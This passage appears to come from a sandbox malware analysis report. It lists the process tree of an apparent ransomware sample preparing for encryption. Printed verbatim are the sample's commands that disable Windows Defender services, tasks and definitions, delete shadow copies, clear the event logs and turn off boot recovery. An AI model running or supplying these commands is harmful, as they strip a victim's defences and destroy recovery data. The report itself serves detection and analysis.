The sequence is a textbook pre-encryption run: stop and disable the backup, shadow-copy and credential-related services; set SecurityHealthService to Start = 4 (disabled); wipe the Windows Defender policy key with reg delete /f and recreate it with every protection switched off (DisableAntiSpyware and DisableAntiVirus, all real-time protection components, PUA detection via MpEnablePus = 0, cloud lookups and sample submission via the SpyNet values, enhanced notifications); and finally set the DefenderApiLogger and DefenderAuditLogger ETW autologgers to Start = 0 so Defender's own event tracing stops. On Defender builds with Tamper Protection enabled these policy values are ignored by the service; the report does not record whether they took effect on this image.
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:420
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:3948
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:3744
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:3728
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1420
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:216
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:596
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:2976
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3036 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1380 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3504 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2284
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3044
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1776
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1032
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:2160 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1748
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3528 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3676 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3712 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2256 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3896 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3532 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:3164 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1512 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:3816
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:3628 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1480
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1068 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:3064
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3368
Network
MITRE ATT&CK Enterprise v6
Downloads